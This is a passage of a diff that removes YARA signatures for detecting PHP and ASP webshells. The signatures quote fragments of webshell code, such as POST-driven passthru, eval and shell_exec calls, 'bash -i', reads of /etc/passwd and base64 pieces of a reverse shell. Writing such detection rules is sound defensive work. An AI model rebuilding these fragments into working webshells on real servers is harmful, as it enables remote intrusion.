-		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
-	condition:
-		3 of them
-}
-rule WebShell_g00nshell_v1_3 {
-	meta:
-		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
-		author = "Florian Roth"
-		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
-	strings:
-		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
-		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
-		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
-		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
-		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
-	condition:
-		2 of them
-}
-rule WebShell_WinX_Shell {
-	meta:
-		description = "PHP Webshells Github Archive - file WinX Shell.php"
-		author = "Florian Roth"
-		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
-	strings:
-		$s4 = "// It's simple shell for all Win OS." fullword
-		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
-		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
-		$s13 = "// Created by greenwood from n57" fullword
-		$s20 = " if (is_uploaded_file($userfile)) {" fullword
-	condition:
-		3 of them
-}
-rule WebShell_PHANTASMA {
-	meta:
-		description = "PHP Webshells Github Archive - file PHANTASMA.php"
-		author = "Florian Roth"
-		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
-	strings:
-		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
-		$s15 = "if ($portscan != \"\") {" fullword
-		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
-		$s20 = "$dono = get_current_user( );" fullword
-	condition:
-		3 of them
-}
-rule WebShell_php_webshells_cw {
-	meta:
-		description = "PHP Webshells Github Archive - file cw.php"
-		author = "Florian Roth"
-		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
-	strings:
-		$s1 = "// Dump Database [pacucci.com]" fullword
-		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
-		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
-		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
-		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
-		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
-	condition:
-		3 of them
-}
-rule WebShell_php_include_w_shell {
-	meta:
-		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
-		author = "Florian Roth"
-		hash = "1a7f4868691410830ad954360950e37c582b0292"
-	strings:
-		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
-		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
-		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
-	condition:
-		1 of them
-}
-rule WebShell_mysql_tool {
-	meta:
-		description = "PHP Webshells Github Archive - file mysql_tool.php"
-		author = "Florian Roth"
-		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
-	strings:
-		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
-		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
-	condition:
-		2 of them
-}
-rule WebShell_PhpSpy_Ver_2006 {
-	meta:
-		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
-		author = "Florian Roth"
-		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
-	strings:
-		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
-		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
-		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
-		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
-	condition:
-		1 of them
-}
-rule WebShell_ZyklonShell {
-	meta:
-		description = "PHP Webshells Github Archive - file ZyklonShell.php"
-		author = "Florian Roth"
-		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
-	strings:
-		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
-		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
-		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
-		$s3 = "<H1>Not Found</H1>" fullword
-	condition:
-		all of them
-}
-rule WebShell_php_webshells_myshell {
-	meta:
-		description = "PHP Webshells Github Archive - file myshell.php"
-		author = "Florian Roth"
-		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
-	strings:
-		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
-		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
-		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
-		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
-	condition:
-		1 of them
-}
-rule WebShell_php_webshells_lolipop {
-	meta:
-		description = "PHP Webshells Github Archive - file lolipop.php"
-		author = "Florian Roth"
-		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
-	strings:
-		$s3 = "$commander = $_POST['commander']; " fullword
-		$s9 = "$sourcego = $_POST['sourcego']; " fullword
-		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
-	condition:
-		all of them
-}
-rule WebShell_simple_cmd {
-	meta:
-		description = "PHP Webshells Github Archive - file simple_cmd.php"
-		author = "Florian Roth"
-		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
-	strings:
-		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
-		$s2 = "<title>G-Security Webshell</title>" fullword
-		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
-		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
-	condition:
-		1 of them
-}
-rule WebShell_go_shell {
-	meta:
-		description = "PHP Webshells Github Archive - file go-shell.php"
-		author = "Florian Roth"
-		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
-	strings:
-		$s0 = "#change this password; for power security - delete this file =)" fullword
-		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
-		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
-		$s12 = "print << \"[kalabanga]\";" fullword
-		$s13 = "<title>GO.cgi</title>" fullword
-	condition:
-		1 of them
-}
-rule WebShell_aZRaiLPhp_v1_0 {
-	meta:
-		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
-		author = "Florian Roth"
-		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
-	strings:
-		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
-		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
-		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
-		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
-	condition:
-		2 of them
-}
-rule WebShell_webshells_zehir4 {
-	meta:
-		description = "Webshells Github Archive - file zehir4"
-		author = "Florian Roth"
-		hash = "788928ae87551f286d189e163e55410acbb90a64"
-		score = 55
-	strings:
-		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
-		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
-	condition:
-		1 of them
-}
-rule WebShell_zehir4_asp_php {
-	meta:
-		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
-		author = "Florian Roth"
-		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
-	strings:
-		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
-		$s11 = "frames.byZehir.document.execCommand("
-		$s15 = "frames.byZehir.document.execCommand(co"
-	condition:
-		2 of them
-}
-rule WebShell_php_webshells_lostDC {
-	meta:
-		description = "PHP Webshells Github Archive - file lostDC.php"
-		author = "Florian Roth"
-		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
-	strings:
-		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
-		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
-		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
-		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
-		$s12 = "$ret = shellexec($command);" fullword
-	condition:
-		2 of them
-}
-rule WebShell_CasuS_1_5 {
-	meta:
-		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
-		author = "Florian Roth"
-		hash = "7eee8882ad9b940407acc0146db018c302696341"
-	strings:
-		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
-		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
-		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
-	condition:
-		1 of them
-}
-rule WebShell_ftpsearch {
-	meta:
-		description = "PHP Webshells Github Archive - file ftpsearch.php"
-		author = "Florian Roth"
-		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
-	strings:
-		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
-		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
-		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
-		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
-	condition:
-		2 of them
-}
-rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {
-	meta:
-		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
-		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
-		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
-	strings:
-		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
-		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
-		$s11 = " *   Coded by Pixcher" fullword
-		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
-	condition:
-		2 of them
-}
-rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {
-	meta:
-		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
-		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
-		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
-	strings:
-		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
-		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
-		$s3 = "$dt = $_POST['filecontent'];" fullword
-		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
-		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
-		$s11 = "document.cmdform.command.value='';" fullword
-		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
-	condition:
-		3 of them
-}
-rule WebShell_Generic_PHP_7 {
-	meta:
-		description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
-		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
-		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
-		hash3 = "715f17e286416724e90113feab914c707a26d456"
-	strings:
-		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
-		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
-		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
-		$s4 = "if( $action == \"dumpTable\" )" fullword
-	condition:
-		2 of them
-}
-rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {
-	meta:
-		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
-		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
-		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
-		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
-	strings:
-		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
-		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
-		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
-		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
-	condition:
-		2 of them
-}
-rule WebShell_Generic_PHP_8 {
-	meta:
-		description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
-		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
-		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
-	strings:
-		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
-		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
-		$s3 = "/* I added this to ensure the script will run correctly..." fullword
-		$s14 = "<!--    </form>   -->" fullword
-		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
-		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
-	condition:
-		3 of them
-}
-rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {
-	meta:
-		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
-		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
-		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
-		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
-	strings:
-		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
-		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
-		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
-		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
-	condition:
-		2 of them
-}
-rule WebShell_Generic_PHP_9 {
-	meta:
-		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
-		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
-		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
-	strings:
-		$s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword
-		$s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword
-		$s12 = "if (!empty($_POST['c'])){" fullword
-		$s13 = "passthru($_POST['c']);" fullword
-		$s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword
-		$s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword
-	condition:
-		3 of them
-}
-rule WebShell__PH_Vayv_PHVayv_PH_Vayv {
-	meta:
-		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
-		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
-		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
-	strings:
-		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
-		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
-		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
-	condition:
-		2 of them
-}
-rule WebShell_Generic_PHP_1 {
-	meta:
-		description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
-		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
-		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
-		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
-	strings:
-		$s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword
-		$s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword
-		$s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword
-		$s9 = "document.shell.command.value = command_hist[current_line];" fullword
-		$s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"
-		$s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword
-		$s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword
-	condition:
-		5 of them
-}
-rule WebShell_Generic_PHP_2 {
-	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
-	strings:
-		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
-		$s4 = "\\$port = {$_POST['port']};" fullword
-		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
-		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
-		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
-	condition:
-		4 of them
-}
-rule WebShell__CrystalShell_v_1_erne_stres {
-	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
-		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
-	strings:
-		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
-		$s4 = "var_dump(curl_exec($ch));" fullword
-		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
-		$s10 = "$m=$_POST['curl'];" fullword
-		$s13 = "$u1p=$_POST['copy'];" fullword
-		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
-		$s15 = "$string = explode(\"|\",$string);" fullword
-		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
-	condition:
-		5 of them
-}
-rule WebShell_Generic_PHP_3 {
-	meta:
-		description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
-		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
-		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
-		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
-	strings:
-		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
-		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
-		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
-		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
-		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
-	condition:
-		all of them
-}
-rule WebShell_Generic_PHP_4 {
-	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
-		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
-	strings:
-		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
-		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
-		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
-		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
-		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
-		$s10 = "foreach ($arr as $filename) {" fullword
-		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
-	condition:
-		all of them
-}
-rule WebShell_Generic_PHP_5 {
-	meta:
-		description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"
-		hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"
-		hash2 = "ad86ef7f24f75081318146edc788e5466722a629"
-	strings:
-		$s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword
-		$s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword
-		$s11 = "if (($perms & 0xC000) == 0xC000) {" fullword
-		$s12 = "$info .= (($perms & 0x0008) ?" fullword
-		$s16 = "// Block special" fullword
-		$s18 = "$info = 's';" fullword
-	condition:
-		all of them
-}
-rule WebShell_GFS {
-	meta:
-		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
-		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
-		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
-	strings:
-		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
-		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
-		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
-	condition:
-		all of them
-}
-rule WebShell__CrystalShell_v_1_sosyete_stres {
-	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
-		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
-	strings:
-		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
-		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
-		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
-		$s15 = "<a bookmark=\"minipanel\">" fullword
-		$s16 = "background-color: #EBEAEA;" fullword
-		$s18 = "color: #D5ECF9;" fullword
-		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
-	condition:
-		all of them
-}
-rule WebShell_Generic_PHP_10 {
-	meta:
-		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
-		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
-		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
-		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
-	strings:
-		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
-		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
-		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
-		$s12 = "else if( $mode & 0xA000 ) " fullword
-		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
-		$s20 = "font-size: 8pt;" fullword
-	condition:
-		all of them
-}
-rule WebShell_Generic_PHP_11 {
-	meta:
-		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
-		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
-		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
-		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
-	strings:
-		$s5 = "$filename = $backupstring.\"$filename\";" fullword
-		$s6 = "while ($file = readdir($folder)) {" fullword
-		$s7 = "if($file != \".\" && $file != \"..\")" fullword
-		$s9 = "$backupstring = \"copy_of_\";" fullword
-		$s10 = "if( file_exists($file_name))" fullword
-		$s13 = "global $file_name, $filename;" fullword
-		$s16 = "copy($file,\"$filename\");" fullword
-		$s18 = "<td width=\"49%\" height=\"142\">" fullword
-	condition:
-		all of them
-}
-rule WebShell__findsock_php_findsock_shell_php_reverse_shell {
-	meta:
-		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
-		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
-		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
-	strings:
-		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
-	condition:
-		all of them
-}
-rule WebShell_Generic_PHP_6 {
-	meta:
-		description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
-		author = "Florian Roth"
-		super_rule = 1
-		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
-		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
-	strings:
-		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
-		$s5 = "echo shell_exec($com);" fullword
-		$s7 = "if($sertype == \"winda\"){" fullword
-		$s8 = "function execute($com)" fullword
-		$s12 = "echo decode(execute($cmd));" fullword
-		$s15 = "echo system($com);" fullword
-	condition:
-		4 of them
-}
-
-rule Unpack_Injectt {
-	meta:
-		description = "Webshells Auto-generated - file Injectt.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8a5d2158a566c87edc999771e12d42c5"
-	strings:
-		$s2 = "%s -Run                              -->To Install And Run The Service"
-		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
-		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
-	condition:
-		all of them
-}
-rule HYTop_DevPack_fso {
-	meta:
-		description = "Webshells Auto-generated - file fso.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b37f3cde1a08890bd822a182c3a881f6"
-	strings:
-		$s0 = "<!-- PageFSO Below -->"
-		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
-	condition:
-		all of them
-}
-rule FeliksPack3___PHP_Shells_ssh {
-	meta:
-		description = "Webshells Auto-generated - file ssh.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1aa5307790d72941589079989b4f900e"
-	strings:
